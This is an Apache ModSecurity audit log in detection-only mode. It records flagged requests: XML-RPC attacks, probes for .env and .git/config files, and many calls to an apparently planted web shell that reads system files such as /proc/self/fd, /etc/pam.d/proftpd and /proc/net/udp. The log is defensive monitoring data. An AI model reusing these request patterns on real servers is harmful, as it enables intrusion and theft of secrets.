p1=334, p2=1845, p3=46, p4=36, p5=107, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2de49a08-Z-- --16b5aa20-A-- [17/Jun/2025:00:39:03.757101 +0530] aFBrz38PxMRZ7s11niQLMwAAAAI 34.68.37.79 48456 127.0.0.1 7081 --16b5aa20-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --16b5aa20-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --16b5aa20-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (78+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (78+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBrz38PxMRZ7s11niQLMwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750100943026420 730748 (- - -) Stopwatch2: 1750100943026420 730748; combined=2870, p1=485, p2=1974, p3=44, p4=65, p5=187, sr=133, sw=115, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --16b5aa20-Z-- --22961f13-A-- [17/Jun/2025:00:39:13.703831 +0530] aFBr2RwcFb_n1P0IC9xmpwAAAAo 3.210.29.96 55038 127.0.0.1 7081 --22961f13-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/170 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.210.29.96 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --22961f13-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --22961f13-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/170"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/170"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBr2RwcFb_n1P0IC9xmpwAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100953699383 4502 (- - -) Stopwatch2: 1750100953699383 4502; combined=2445, p1=399, p2=1917, p3=42, p4=27, p5=59, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --22961f13-Z-- --d09f6d1e-A-- [17/Jun/2025:00:39:33.945340 +0530] aFBr7U3CmevS3xeTzmokqwAAAAQ 216.73.216.71 58324 127.0.0.1 7081 --d09f6d1e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fskel&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fskel%2F.bash_logout HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --d09f6d1e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3134 Connection: close Content-Type: text/html; charset=UTF-8 --d09f6d1e-H-- Message: Warning. Matched phrase ".bash_logout" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bash_logout found within ARGS:viewfile: /proc/self/root/etc/skel/.bash_logout"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".bash_logout" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bash_logout found within ARGS:viewfile: /proc/self/root/etc/skel/.bash_logout"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBr7U3CmevS3xeTzmokqwAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100973940809 4600 (- - -) Stopwatch2: 1750100973940809 4600; combined=2331, p1=379, p2=1815, p3=36, p4=40, p5=61, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d09f6d1e-Z-- --b16d3d1e-A-- [17/Jun/2025:00:39:52.517332 +0530] aFBsAH8PxMRZ7s11niQLZAAAAAI 54.163.169.168 49414 127.0.0.1 7081 --b16d3d1e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/192 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.163.169.168 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --b16d3d1e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --b16d3d1e-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/192"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/192"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBsAH8PxMRZ7s11niQLZAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100992512817 4568 (- - -) Stopwatch2: 1750100992512817 4568; combined=2516, p1=376, p2=2016, p3=45, p4=27, p5=52, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b16d3d1e-Z-- --6d0b564a-A-- [17/Jun/2025:00:40:03.848998 +0530] aFBsC03CmevS3xeTzmokugAAAAQ 34.68.37.79 49594 127.0.0.1 7081 --6d0b564a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 486 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --6d0b564a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --6d0b564a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBsC03CmevS3xeTzmokugAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101003117764 731297 (- - -) Stopwatch2: 1750101003117764 731297; combined=2844, p1=535, p2=1861, p3=43, p4=68, p5=209, sr=123, sw=128, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6d0b564a-Z-- --baab3947-A-- [17/Jun/2025:00:40:14.227873 +0530] aFBsFk3CmevS3xeTzmokyAAAAAQ 216.73.216.71 39998 127.0.0.1 7081 --baab3947-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fnet&viewfile=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fnet%2Fudp HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --baab3947-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3173 Connection: close Content-Type: text/html; charset=UTF-8 --baab3947-H-- Message: Warning. Matched phrase "proc/net/udp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/udp found within ARGS:viewfile: /proc/self/root/proc/net/udp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/net/udp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/udp found within ARGS:viewfile: /proc/self/root/proc/net/udp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBsFk3CmevS3xeTzmokyAAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101014223683 4246 (- - -) Stopwatch2: 1750101014223683 4246; combined=2279, p1=339, p2=1810, p3=35, p4=37, p5=58, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --baab3947-Z-- --668bfe7e-A-- [17/Jun/2025:00:40:18.232003 +0530] aFBsGiid3pHxA3RhGpzrtgAAAAk 216.73.216.71 40504 127.0.0.1 7081 --668bfe7e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fpam.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fpam.d%2Fproftpd HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --668bfe7e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3159 Connection: close Content-Type: text/html; charset=UTF-8 --668bfe7e-H-- Message: Warning. Matched phrase "etc/pam.d/proftpd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/pam.d/proftpd found within ARGS:viewfile: /proc/self/root/etc/pam.d/proftpd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/pam.d/proftpd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/pam.d/proftpd found within ARGS:viewfile: /proc/self/root/etc/pam.d/proftpd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBsGiid3pHxA3RhGpzrtgAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101018227950 4128 (- - -) Stopwatch2: 1750101018227950 4128; combined=2226, p1=379, p2=1713, p3=35, p4=33, p5=66, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --668bfe7e-Z-- --15904148-A-- [17/Jun/2025:00:41:03.752846 +0530] aFBsR38PxMRZ7s11niQLmwAAAAI 34.68.37.79 36222 127.0.0.1 7081 --15904148-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --15904148-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --15904148-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (78+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (78+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBsR38PxMRZ7s11niQLmwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101063037169 715737 (- - -) Stopwatch2: 1750101063037169 715737; combined=3142, p1=510, p2=2201, p3=48, p4=73, p5=193, sr=140, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --15904148-Z-- --b71ae818-A-- [17/Jun/2025:00:41:14.664157 +0530] aFBsUn8PxMRZ7s11niQLqgAAAAI 216.73.216.71 58174 127.0.0.1 7081 --b71ae818-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fprofile.d%2Fnodenv.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b71ae818-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3176 Connection: close Content-Type: text/html; charset=UTF-8 --b71ae818-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/nodenv.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /proc/self/root/etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBsUn8PxMRZ7s11niQLqgAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /proc/self/root/etc/profile.d/nodenv.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBsUn8PxMRZ7s11niQLqgAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101074659393 4828 (- - -) Stopwatch2: 1750101074659393 4828; combined=2733, p1=432, p2=2101, p3=53, p4=34, p5=112, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b71ae818-Z-- --44144558-A-- [17/Jun/2025:00:41:52.461764 +0530] aFBseJVkCcfT-Z8NQYyWqgAAAAc 216.73.216.71 59616 127.0.0.1 7081 --44144558-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fnet&viewfile=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fnet%2Fudp6 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --44144558-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3195 Connection: close Content-Type: text/html; charset=UTF-8 --44144558-H-- Message: Warning. Matched phrase "proc/net/udp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/udp found within ARGS:viewfile: /proc/self/root/proc/net/udp6"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/net/udp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/udp found within ARGS:viewfile: /proc/self/root/proc/net/udp6"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBseJVkCcfT-Z8NQYyWqgAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750101112458085 3747 (- - -) Stopwatch2: 1750101112458085 3747; combined=1970, p1=396, p2=1456, p3=34, p4=32, p5=52, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --44144558-Z-- --1794516f-A-- [17/Jun/2025:00:41:56.783848 +0530] aFBsfB6Azi2u_ik2Q3KrAwAAAAY 209.38.248.17 60112 127.0.0.1 7081 --1794516f-B-- GET /.env HTTP/1.0 Host: www.bspsons.com X-Real-IP: 209.38.248.17 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --1794516f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --1794516f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/.env"] [unique_id "aFBsfB6Azi2u_ik2Q3KrAwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101116298514 485393 (- - -) Stopwatch2: 1750101116298514 485393; combined=1718, p1=330, p2=1297, p3=0, p4=0, p5=90, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1794516f-Z-- --f33a790e-A-- [17/Jun/2025:00:41:57.720533 +0530] aFBsfe2BajTuKRK3FvJ80gAAAAE 209.38.248.17 60232 127.0.0.1 7081 --f33a790e-B-- GET /.git/config HTTP/1.0 Host: www.bspsons.com X-Real-IP: 209.38.248.17 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --f33a790e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --f33a790e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/.git/config"] [unique_id "aFBsfe2BajTuKRK3FvJ80gAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101117238045 482559 (- - -) Stopwatch2: 1750101117238045 482559; combined=1508, p1=282, p2=1106, p3=0, p4=0, p5=119, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f33a790e-Z-- --9fc4c938-A-- [17/Jun/2025:00:42:04.243141 +0530] aFBsgx6Azi2u_ik2Q3KrDAAAAAY 34.68.37.79 56868 127.0.0.1 7081 --9fc4c938-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 34.68.37.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --9fc4c938-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --9fc4c938-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 34.68.37.79 (79+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFBsgx6Azi2u_ik2Q3KrDAAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750101123538792 704415 (- - -) Stopwatch2: 1750101123538792 704415; combined=2150, p1=401, p2=1368, p3=39, p4=59, p5=177, sr=114, sw=106, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9fc4c938-Z-- --61d3476d-A-- [17/Jun/2025:00:42:06.046586 +0530] aFBshhwcFb_n1P0IC9xnUgAAAAo 216.73.216.71 57212 